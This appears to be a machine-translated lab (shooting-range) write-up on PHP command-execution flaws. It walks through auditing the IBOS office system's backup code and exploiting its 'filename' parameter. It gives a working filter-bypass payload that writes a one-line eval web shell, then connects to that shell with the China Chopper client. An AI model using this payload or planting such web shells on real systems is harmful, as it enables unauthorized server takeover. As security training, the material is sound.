Little knowledge

• The target machine is linux Executed on yes Bash command , If it is windows What we're doing is cmd command .
• cmd in & Means to execute multiple commands .
• Discussion about Command Execution Vulnerability bypassing filtering

Loophole principle

1. The data entered by the user is executed as a system command .
2. Code execution ： The data entered by the user is treated as Back end code perform
   Command execution ： The data entered by the user is treated as System commands 【cmd、bash】 perform
3. <?php system('whoami')?> In fact, the essence of a Trojan horse is a command execution vulnerability .
4. echo "<?php eval($_REQUEST[8])?>" 123.php adopt cmd Writing documents .
5. Through code execution vulnerability => Can call system commands system('whoami')
   Through system command vulnerability => Can call code to execute , Such as cmd Write file to get shell.
6. Because when the code is executed , Functions that can be called for command execution , So most code execution can call system commands , The terminal operation of the kitchen knife also uses the command execution function .

Function analysis

system() function

Execute the command and return the result and output

exec() function

Only execute , And only the last line of the result will be returned

shell_exec() function

Execute the command and return all results , But no output

`` [ The quotation marks ]

Execute the command and return the result , But there's no output 【shell_exec Special way of writing , That is, it is forbidden shell_exec() Function backquotes do not take effect 】.

passthru() function

Execute the command and return the result and output all

popen()

popen( Commands to execute , Parameters )

$a = popen('whoami','r');       //r It's read-only 、w Yes write 
echo fread($a,1024);     
// The return value of this execution is special , What is returned is a file pointer , Need to use fread To read the return value ;1024 Refers to the length of the return value .

For penetration testers , The return value is not that important , The core is that the code has indeed been executed , This is the top priority .

zend encryption

Zend Guard It's the most mature one on the market PHP Source code encryption products , as long as PHP The third-party encryption plug-in is loaded , Then you can directly run the encrypted source code , There are also related decryption tools on the Internet .

Range practice

1. The shooting range uses IBOS Office system , One click installation website system 【 mount this database 、 Website 、web Containers 、 And configure 】.
2. Let's start with the local installation test , Because of exe Executable file , Therefore, it is recommended to install in the virtual machine .
3. After successful installation, you can get the source code , We open the code audit tool , Find the first function system().
   
4. The second function exec()
   
   The previous ones are obviously all about databases sql Of the statement , Independent of system commands .

shell_exec($mysqlBin . "mysql -h\"" . $db["host"] . ($db["port"] ? (is_numeric($db["port"]) ? " -P" . $db["port"] : " -S\"" . $db["port"] . "\"") : "") . "\" -u\"" . $db["username"] . "\" -p\"" . $db["password"] . "\" \"" . $db["dbname"] . "\" < " . $file);

5. When we come across a very complex statement , go back to IBOS page , After testing , The meaning of this string of code is this sql Statement is written to the database .

C:/IBOS520/MySQL/bin/mysql -h"127.0.0.1 -P3306" -u"root" -p"root" "ibos" < backup/2022-01-27_L6c686H4.sql

Through code audit, we know that the function of the previous step is to import the database , After trying, the system will filter the information we enter , In other words, we cannot tamper with the database id , The background will verify whether the file exists .

7. We know that accessing the database will run system command functions , Since the recovery of the database requires detection , There is no point to use . Then we try to use database backup to execute system commands , Just one of the backup modes is to use system commands for backup , System commands must be executed here .
   
8. Found file exists zend encryption , To decrypt .
9. Let's look for the function again shell_exec(), Found new uses .
   

$dumpFile => 
$dumpFile = $backupFileName . "-%s.sql";
$backupFileName = self::BACKUP_DIR . "/" .core\utils\str_replace(array("/", "\\", ".", "'"), "", $fileName);     
$fileName = core\utils\Env::getRequest("filename");

//BACKUP_DIR For constant ;str_replace For the function , The core is regular substitution , The variable filename To deal with ,/ \\ . '  All will become empty .
//getRequest To accept a parameter 

10. find filename This reference point , take filename The parameter transfer method of is defined by POST It is amended as follows GET , This can avoid URL Statement invalidation caused by encoding , And the source code allows GET The ginseng . Backstage meeting . To filter , We use cmd Function to avoid . Construct the final payload by 1&echo "<?php @eval($_REQUEST[8]);?>" >a666%PATHEXT:~0,1%php&1, Conduct url code .
    

11. Successfully uploaded a word Trojan , Use a kitchen knife to connect and get flag.